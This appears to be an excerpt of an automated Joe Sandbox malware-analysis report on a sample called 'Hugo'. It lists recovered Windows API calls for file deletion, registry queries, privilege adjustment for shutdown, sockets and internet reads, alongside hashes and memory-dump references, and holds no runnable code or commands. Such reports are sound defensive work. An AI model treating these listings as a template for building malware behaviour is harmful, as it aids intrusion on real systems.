                                                                                                                                                                                                              • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove_wcslen
                                                                                                                                                                                                              • String ID: :$\$\??\%s
                                                                                                                                                                                                              • API String ID: 1149970189-3457252023
                                                                                                                                                                                                              • Opcode ID: 96c3105594d98f0756eeff2c74327b89eed443e3dce7d25db52c7634ffbd6047
                                                                                                                                                                                                              • Instruction ID: 784c612b439979234fcb04f6c6fd98c8992d388069be88a784d0b895ac87efe6
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 96c3105594d98f0756eeff2c74327b89eed443e3dce7d25db52c7634ffbd6047
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1631C4B190024AABDB21AFA0DC49FEF37BDEF89750F1041B6F509D6060E774A644EB24
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • FindFirstFileW.KERNEL32(?,?,76228FB0,?,00000000), ref: 00F8A203
                                                                                                                                                                                                              • FindNextFileW.KERNEL32(00000000,?), ref: 00F8A25E
                                                                                                                                                                                                              • FindClose.KERNEL32(00000000), ref: 00F8A269
                                                                                                                                                                                                              • FindFirstFileW.KERNEL32(*.*,?), ref: 00F8A285
                                                                                                                                                                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00F8A2D5
                                                                                                                                                                                                              • SetCurrentDirectoryW.KERNEL32(00FD7B94), ref: 00F8A2F3
                                                                                                                                                                                                              • FindNextFileW.KERNEL32(00000000,00000010), ref: 00F8A2FD
                                                                                                                                                                                                              • FindClose.KERNEL32(00000000), ref: 00F8A30A
                                                                                                                                                                                                              • FindClose.KERNEL32(00000000), ref: 00F8A31A
                                                                                                                                                                                                                • Part of subcall function 00F7E399: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00F7E3B4
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
                                                                                                                                                                                                              • String ID: *.*
                                                                                                                                                                                                              • API String ID: 2640511053-438819550
                                                                                                                                                                                                              • Opcode ID: 1abcab34529a0a19af5052a30798bf5fe7ad246b540a46f3639175da27769d5b
                                                                                                                                                                                                              • Instruction ID: 729ed464003f7e99764ccc56bbf0a8918e8db442e545a3b6b4598952a41acc2e
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1abcab34529a0a19af5052a30798bf5fe7ad246b540a46f3639175da27769d5b
                                                                                                                                                                                                              • Instruction Fuzzy Hash: B031037290060D6AEF20BFA4DC09ADE77ACDF45334F144193E811A2190EB35DE85EB22
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 00F9D3F8: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00F9C10E,?,?), ref: 00F9D415
                                                                                                                                                                                                                • Part of subcall function 00F9D3F8: _wcslen.LIBCMT ref: 00F9D451
                                                                                                                                                                                                                • Part of subcall function 00F9D3F8: _wcslen.LIBCMT ref: 00F9D4C8
                                                                                                                                                                                                                • Part of subcall function 00F9D3F8: _wcslen.LIBCMT ref: 00F9D4FE
                                                                                                                                                                                                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00F9C99E
                                                                                                                                                                                                              • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?), ref: 00F9CA09
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 00F9CA2D
                                                                                                                                                                                                              • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00F9CA8C
                                                                                                                                                                                                              • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 00F9CB47
                                                                                                                                                                                                              • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 00F9CBB4
                                                                                                                                                                                                              • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 00F9CC49
                                                                                                                                                                                                              • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,00000000,?,?,?,00000000), ref: 00F9CC9A
                                                                                                                                                                                                              • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 00F9CD43
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?,?,00000000), ref: 00F9CDE2
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 00F9CDEF
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: QueryValue$Close_wcslen$BuffCharConnectOpenRegistryUpper
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3102970594-0
                                                                                                                                                                                                              • Opcode ID: 8db8f5d57bbf98326c6f10da9a4786c0193d19a37cbd28dcddb0ef6a2d36ce2d
                                                                                                                                                                                                              • Instruction ID: b7cc6d828fa00161edd5abf43dc902ac0842ea3c610d769a15644cedfad94207
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8db8f5d57bbf98326c6f10da9a4786c0193d19a37cbd28dcddb0ef6a2d36ce2d
                                                                                                                                                                                                              • Instruction Fuzzy Hash: D5025271A042009FDB14DF24C895E2ABBE5FF89314F18849DF84ACB2A2D735ED46DB91
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 00F15851: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00F155D1,?,?,00F54B76,?,?,00000100,00000000,00000000,CMDLINE), ref: 00F15871
                                                                                                                                                                                                                • Part of subcall function 00F7EAB0: GetFileAttributesW.KERNEL32(?,00F7D840), ref: 00F7EAB1
                                                                                                                                                                                                              • FindFirstFileW.KERNEL32(?,?), ref: 00F7D9CD
                                                                                                                                                                                                              • DeleteFileW.KERNEL32(?,?,?,?,?,00000000,?,?,?), ref: 00F7DA88
                                                                                                                                                                                                              • MoveFileW.KERNEL32(?,?), ref: 00F7DA9B
                                                                                                                                                                                                              • DeleteFileW.KERNEL32(?,?,?,?), ref: 00F7DAB8
                                                                                                                                                                                                              • FindNextFileW.KERNEL32(00000000,00000010), ref: 00F7DAE2
                                                                                                                                                                                                                • Part of subcall function 00F7DB47: CopyFileExW.KERNEL32(?,?,00000000,00000000,00000000,00000008,?,?,00F7DAC7,?,?), ref: 00F7DB5D
                                                                                                                                                                                                              • FindClose.KERNEL32(00000000,?,?,?), ref: 00F7DAFE
                                                                                                                                                                                                              • FindClose.KERNEL32(00000000), ref: 00F7DB0F
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: File$Find$CloseDelete$AttributesCopyFirstFullMoveNameNextPath
                                                                                                                                                                                                              • String ID: \*.*
                                                                                                                                                                                                              • API String ID: 1946585618-1173974218
                                                                                                                                                                                                              • Opcode ID: 311f0295a6586f4ac75b7587b3b8cc1e6736456d7691cb1c099a917ea0f312b3
                                                                                                                                                                                                              • Instruction ID: c59647448c0291dfc39a9fccc27481b4cb217b61cb87c0489f58a3fe5c4822e7
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 311f0295a6586f4ac75b7587b3b8cc1e6736456d7691cb1c099a917ea0f312b3
                                                                                                                                                                                                              • Instruction Fuzzy Hash: CD617E31C0110DEECF05EBA0DD929EDB7B5AF54300F6080A6E406B7192EB395F49EB51
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1737998785-0
                                                                                                                                                                                                              • Opcode ID: e0de43c5e77494cd1127dac486fc5be5cebeef584d7ad96bef1220412f98b697
                                                                                                                                                                                                              • Instruction ID: 2f6a2a410411287d0b4fdd98951fdfba3b1274659860df902a55b35e490193c9
                                                                                                                                                                                                              • Opcode Fuzzy Hash: e0de43c5e77494cd1127dac486fc5be5cebeef584d7ad96bef1220412f98b697
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7B41AD71A04601AFD710DF15D888B95BBE4FF45328F14C0A8E85A8FB62CB35EC46EB90
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 00F72010: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00F7205A
                                                                                                                                                                                                                • Part of subcall function 00F72010: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00F72087
                                                                                                                                                                                                                • Part of subcall function 00F72010: GetLastError.KERNEL32 ref: 00F72097
                                                                                                                                                                                                              • ExitWindowsEx.USER32(?,00000000), ref: 00F7F249
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                                                                                                                                                                              • String ID: $ $@$SeShutdownPrivilege
                                                                                                                                                                                                              • API String ID: 2234035333-3163812486
                                                                                                                                                                                                              • Opcode ID: 51d4076b8c7aaf91a3308ed8c1cd0ec86668a464f9ab8e07be65c219bd62dfd7
                                                                                                                                                                                                              • Instruction ID: 9704c4614179601ca4e0461fdfd7bffdde5eff3dbc37975c239e0d433f16d70f
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 51d4076b8c7aaf91a3308ed8c1cd0ec86668a464f9ab8e07be65c219bd62dfd7
                                                                                                                                                                                                              • Instruction Fuzzy Hash: AA01DB76B202146BEB1466785C89BBE726C9F09364F158533FD07E21D3D5645D08F162
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,00F556C2,?,?,00000000,00000000), ref: 00F83A1E
                                                                                                                                                                                                              • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00F556C2,?,?,00000000,00000000), ref: 00F83A35
                                                                                                                                                                                                              • LoadResource.KERNEL32(?,00000000,?,?,00F556C2,?,?,00000000,00000000,?,?,?,?,?,?,00F166CE), ref: 00F83A45
                                                                                                                                                                                                              • SizeofResource.KERNEL32(?,00000000,?,?,00F556C2,?,?,00000000,00000000,?,?,?,?,?,?,00F166CE), ref: 00F83A56
                                                                                                                                                                                                              • LockResource.KERNEL32(00F556C2,?,?,00F556C2,?,?,00000000,00000000,?,?,?,?,?,?,00F166CE,?), ref: 00F83A65
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                                                                                                                                                                              • String ID: SCRIPT
                                                                                                                                                                                                              • API String ID: 3051347437-3967369404
                                                                                                                                                                                                              • Opcode ID: 794edad9091aac9fd507ce486fa350f85a953e526b8ab6889fe487a046126076
                                                                                                                                                                                                              • Instruction ID: 26d78a70f61d3ab9d20c986ddc06bbdb82d9c2d6d129077bde55ad786b5a91ee
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 794edad9091aac9fd507ce486fa350f85a953e526b8ab6889fe487a046126076
                                                                                                                                                                                                              • Instruction Fuzzy Hash: C41179B4600705BFE7259B25DC48F677BB9EBC6B50F14426CB402D66A0DBB1E900EA20
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 00F71900: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00F71916
                                                                                                                                                                                                                • Part of subcall function 00F71900: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00F71922
                                                                                                                                                                                                                • Part of subcall function 00F71900: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00F71931
                                                                                                                                                                                                                • Part of subcall function 00F71900: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00F71938
                                                                                                                                                                                                                • Part of subcall function 00F71900: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00F7194E
                                                                                                                                                                                                              • GetLengthSid.ADVAPI32(?,00000000,00F71C81), ref: 00F720FB
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000000), ref: 00F72107
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 00F7210E
                                                                                                                                                                                                              • CopySid.ADVAPI32(00000000,00000000,?), ref: 00F72127
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000,00F71C81), ref: 00F7213B
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 00F72142
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3008561057-0
                                                                                                                                                                                                              • Opcode ID: 550cc927a4d1f15f51c232ed7b6e2aca86ac47d5e787587ee04f91ea7281e674
                                                                                                                                                                                                              • Instruction ID: 17a70154932cff185f3c15faca02f3e308f1202dbfc48954a0ebe5076c52d0c3
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 550cc927a4d1f15f51c232ed7b6e2aca86ac47d5e787587ee04f91ea7281e674
                                                                                                                                                                                                              • Instruction Fuzzy Hash: A41100B2A00208FFDB509F64CC48BAE7BB9FF41365F10C01AE94A93121C3759900EB61
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 00F1B329: _wcslen.LIBCMT ref: 00F1B333
                                                                                                                                                                                                              • FindFirstFileW.KERNEL32(00000001,?,*.*,?,?,00000000,00000000), ref: 00F8A5BD
                                                                                                                                                                                                              • FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 00F8A6D0
                                                                                                                                                                                                                • Part of subcall function 00F842B9: GetInputState.USER32 ref: 00F84310
                                                                                                                                                                                                                • Part of subcall function 00F842B9: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00F843AB
                                                                                                                                                                                                              • Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 00F8A5ED
                                                                                                                                                                                                              • FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 00F8A6BA
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Find$File$CloseFirstInputMessageNextPeekSleepState_wcslen
                                                                                                                                                                                                              • String ID: *.*
                                                                                                                                                                                                              • API String ID: 1972594611-438819550
                                                                                                                                                                                                              • Opcode ID: 2efbba9facb39b587375472a81171167a602e46777f0b9b91f71d731c0847892
                                                                                                                                                                                                              • Instruction ID: 289619005d890529ae6a90e9abf5818faf9e86cc4568f6b394b3f4566ea2987c
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2efbba9facb39b587375472a81171167a602e46777f0b9b91f71d731c0847892
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2B41417190020AEFDF15EFA4CC49AEEBBB4FF05320F144056E815A61A1EB359E85EF61
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • DefDlgProcW.USER32(?,?), ref: 00F1233E
                                                                                                                                                                                                              • GetSysColor.USER32(0000000F), ref: 00F12421
                                                                                                                                                                                                              • SetBkColor.GDI32(?,00000000), ref: 00F12434
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Color$Proc
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 929743424-0
                                                                                                                                                                                                              • Opcode ID: 6037cb3b02ebf5c81d2516e47b07c89ef070b968c528819a9f42b25ed626d21f
                                                                                                                                                                                                              • Instruction ID: 8921729d187dcdaeb9b8ee901f33933cdd52e58ee564d4414ab97ac949a4aef9
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6037cb3b02ebf5c81d2516e47b07c89ef070b968c528819a9f42b25ed626d21f
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8D8168F2908408BEE26C66BC4C88FFF355DDB47361F150119F612C6596D95D8FA2B232
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 00F93AAB: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00F93AD7
                                                                                                                                                                                                                • Part of subcall function 00F93AAB: _wcslen.LIBCMT ref: 00F93AF8
                                                                                                                                                                                                              • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 00F922BA
                                                                                                                                                                                                              • WSAGetLastError.WSOCK32 ref: 00F922E1
                                                                                                                                                                                                              • bind.WSOCK32(00000000,?,00000010), ref: 00F92338
                                                                                                                                                                                                              • WSAGetLastError.WSOCK32 ref: 00F92343
                                                                                                                                                                                                              • closesocket.WSOCK32(00000000), ref: 00F92372
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ErrorLast$_wcslenbindclosesocketinet_addrsocket
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1601658205-0
                                                                                                                                                                                                              • Opcode ID: 490daa4125780c267d12a6d3c6abc8429c39ce4633ece0a3edad95206511bd30
                                                                                                                                                                                                              • Instruction ID: 9391a049af28037cead5ab7d218425482f7ebcc712b2103b0d5761105694fea5
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 490daa4125780c267d12a6d3c6abc8429c39ce4633ece0a3edad95206511bd30
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2C51D675A40210AFEB10EF24D886F6A77E5AB45764F448048F9455F3C3C778AD42DBE1
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 292994002-0
                                                                                                                                                                                                              • Opcode ID: c95087ccea035721bcedbdda75a53d480df0a21fa2513f4c674d75443a0de7f8
                                                                                                                                                                                                              • Instruction ID: d6bbe3b5cfd037f54d0452c9471b7ea584a4d29b1229112f50ba7d59bb577b5b
                                                                                                                                                                                                              • Opcode Fuzzy Hash: c95087ccea035721bcedbdda75a53d480df0a21fa2513f4c674d75443a0de7f8
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4C2108B5B002158FD7509F2EC844B5A7BE5FF86324F58806CE84A8B351CB75EE42EB90
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • InternetReadFile.WININET(?,?,00000400,?), ref: 00F8D8CE
                                                                                                                                                                                                              • GetLastError.KERNEL32(?,00000000), ref: 00F8D92F
                                                                                                                                                                                                              • SetEvent.KERNEL32(?,?,00000000), ref: 00F8D943
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
